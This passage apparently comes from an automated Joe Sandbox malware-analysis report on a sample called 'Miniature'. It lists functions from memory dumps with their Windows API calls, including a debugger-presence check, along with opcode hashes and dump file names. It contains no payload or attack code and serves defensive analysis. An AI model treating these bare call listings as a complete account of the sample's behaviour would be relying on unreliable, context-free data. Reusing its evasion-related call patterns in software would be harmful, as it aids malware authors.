                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80fbfe40d0e9dda8bd9e0e1995722f08a34b0ef204bc36fde30305c36b72ba40
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE126C719083419FCB14DF28C488B6ABBE5FF85314F14895DE8998B392CB31ED49CB92
                                                                                                                                                                                                                                                                                            Function 00C99AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 306214811-0
                                                                                                                                                                                                                                                                                            • Opcode ID: fe3582fc240c386eda5558c168ade53cf27b761d66e970dc8ae1b84c291779b3
                                                                                                                                                                                                                                                                                            • Instruction ID: d8a424873e3d9363c62663ae3cb07056b008ebf5cbe4b8447917c2d6c915e2b8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe3582fc240c386eda5558c168ade53cf27b761d66e970dc8ae1b84c291779b3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54A17831604205EFCB18DF18D4D59A9BBA1FF4A314B6084ADF81A8F692DB31ED52DB80
                                                                                                                                                                                                                                                                                            Function 00C12793 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C132AF
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C132B7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C132C2
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C132CD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C132D5
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C132DD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C13205: RegisterWindowMessageW.USER32(00000004,?,00C12964), ref: 00C1325D
                                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C12A0A
                                                                                                                                                                                                                                                                                            • OleInitialize.OLE32 ref: 00C12A28
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00C53A0D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4af6c016bd2631947bcbd0d232367e6ad82fb0d44d5fa5bf37d71d1d680d5087
                                                                                                                                                                                                                                                                                            • Instruction ID: 586b6de99626f98ae0b608ccfaaae034ad0941c5365b1cbd6d96d453711b91b8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4af6c016bd2631947bcbd0d232367e6ad82fb0d44d5fa5bf37d71d1d680d5087
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8718EF19023C58E8798EF79EEE675D3AECFB49304350452AE019CB2A1EBB04481EF55
                                                                                                                                                                                                                                                                                            Function 00C2FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C161A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C16299
                                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00C2FD36
                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C2FD45
                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C6FE33
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b1045627b6911afea2d2f78b1273080812ba4ba86884ab6a5f5c51d04f3daaa3
                                                                                                                                                                                                                                                                                            • Instruction ID: b539a18bd4747489a320c71eb6377d25cf15a7736b5eca12cf71dfe426303eed
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1045627b6911afea2d2f78b1273080812ba4ba86884ab6a5f5c51d04f3daaa3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE319871904354AFDB32CF249895BEABBFC9B02308F0004ADE5DA97241C3742A86CB51
                                                                                                                                                                                                                                                                                            Function 00C48A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?,00C4894C,?,00CD9CE8,0000000C), ref: 00C48A84
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00C4894C,?,00CD9CE8,0000000C), ref: 00C48A8E
                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C48AB9
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2583163307-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b3754095c8ead3486dc21887e5c868d7dfc66a51e6c6b5c886ccab9f1c067f10
                                                                                                                                                                                                                                                                                            • Instruction ID: 6cdece20064ceec1014a82505076d6f165bc496148c5340ab05fcbc946815a80
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3754095c8ead3486dc21887e5c868d7dfc66a51e6c6b5c886ccab9f1c067f10
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4014E32A155605BCA246374AC8677E77457B82B38F29012AF8259B1D3DFB0CEC5B191
                                                                                                                                                                                                                                                                                            Function 00C4970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00C497BA,FF8BC369,00000000,00000002,00000000), ref: 00C49744
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00C497BA,FF8BC369,00000000,00000002,00000000,?,00C45ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00C36F41), ref: 00C4974E
                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00C49755
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8a88e9b376e83d006ae17e9627f2348a6888ec714616a094f2677de7ba87dd57
                                                                                                                                                                                                                                                                                            • Instruction ID: 7ae2ecf543cc292dcdb63e466c28318c0a96dd1cb5d81b0158edf6b197e29540
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a88e9b376e83d006ae17e9627f2348a6888ec714616a094f2677de7ba87dd57
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D01FC32630524ABCF159F99DC45DAF7B29FB85330F240259F8219B190EA71DE91DBD0
                                                                                                                                                                                                                                                                                            Function 00C1F238 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00C1F27B
                                                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00C1F289
                                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C1F29F
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00C1F2B1
                                                                                                                                                                                                                                                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00C632D8
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3288985973-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5982124500a7148ba1c8b51568ca4e6b11d76299dc6ce1d51a9b2b846d80fc23
                                                                                                                                                                                                                                                                                            • Instruction ID: 4835261f0e6db38c41746cc1c80f31e44af0aa2be028b155aca47b8a5842b431
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5982124500a7148ba1c8b51568ca4e6b11d76299dc6ce1d51a9b2b846d80fc23
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6EF05E706443849BEB348BA0DC89FDE73ACAB46304F104929E65BD70C0DB7496889B25
                                                                                                                                                                                                                                                                                            Function 00C22B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00C23006
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                            • String ID: CALL
                                                                                                                                                                                                                                                                                            • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                                            • Opcode ID: b2e369fa2e1ed714304cde7a683ac3ac15ff99660b9e999e3c3541829daff541
                                                                                                                                                                                                                                                                                            • Instruction ID: c354e0d0119cab5a1668d1fb793240c3b0f8b5a4a31cdb09d57b739c957739e2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2e369fa2e1ed714304cde7a683ac3ac15ff99660b9e999e3c3541829daff541
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD22AC70608351AFC724DF24D884B2ABBF1BF84314F24895DF4968B7A1D771EA41DB92
                                                                                                                                                                                                                                                                                            Function 00C21990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: def5ac035eba99b9a87b6546bfdb0881c1e5bafde9e9248550b6276475543410
                                                                                                                                                                                                                                                                                            • Instruction ID: 8fea99b4850ca14021902c63e7776707ba7953c6b6987c438db6d65d1329e67d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: def5ac035eba99b9a87b6546bfdb0881c1e5bafde9e9248550b6276475543410
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0432E171A00215DFCB20EF54D891BAEB7B4FF15314F188558F865AB2A1DB31EE80EB91
                                                                                                                                                                                                                                                                                            Function 00C13A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00C5413B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C155D1,?,?,00C54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C15871
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C13A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00C13A76
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                                            • String ID: X
                                                                                                                                                                                                                                                                                            • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                                                                            • Opcode ID: b63219426261c3becce5666e51c482a00feae9769f88a1c7503d10ae0ec82cd2
                                                                                                                                                                                                                                                                                            • Instruction ID: 08b8ecaaa5a6463e4ff2f731a18150f37e001c7010141fd88c97e926e0a781ae
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b63219426261c3becce5666e51c482a00feae9769f88a1c7503d10ae0ec82cd2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD219371A042989BDF01DF94C805BEE7BFCAF4A314F00805AE545A7281DBB49ACDAF61
                                                                                                                                                                                                                                                                                            Function 00C1396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C13A3C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 819da3ef009141b87df34c9b20fdb6f56ae1bbaada99cbaee26fca4d6465e7e6
                                                                                                                                                                                                                                                                                            • Instruction ID: c4be7427ae613b92179361e7375d23be890fe50097df8d927188d9ccf87edcbd
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 819da3ef009141b87df34c9b20fdb6f56ae1bbaada99cbaee26fca4d6465e7e6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8031B1705043408FD720DF24D8857DBBBE8FF4A318F00092EE6DA87250E775AA88DB52
                                                                                                                                                                                                                                                                                            Function 00C1331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsThemeActive.UXTHEME ref: 00C1333D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C132E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C132FB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C132E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C13312
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00C13368,?), ref: 00C133BB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00C13368,?), ref: 00C133CE
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00CE2418,00CE2400,?,?,?,?,?,?,00C13368,?), ref: 00C1343A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00CE2418,?,?,?,?,?,?,?,00C13368,?), ref: 00C134BB
                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00C13377
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                                            • Opcode ID: eac1d0b0423e9bc21b0ebb8ae4a9e50a22d50be55951ee7d26b9f8aee2e5fa18
                                                                                                                                                                                                                                                                                            • Instruction ID: a047efff8822278802963d7c57920be1ce65488801cc4888435d4abc10f04f81
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eac1d0b0423e9bc21b0ebb8ae4a9e50a22d50be55951ee7d26b9f8aee2e5fa18
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AF05E719983C49FD3006F60EC8AB7C37ACA70171DF044915B90A8E1F2CBBA95A1AF44
                                                                                                                                                                                                                                                                                            Function 00C2FFE0 Relevance: 2.6, APIs: 2, Instructions: 94sleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
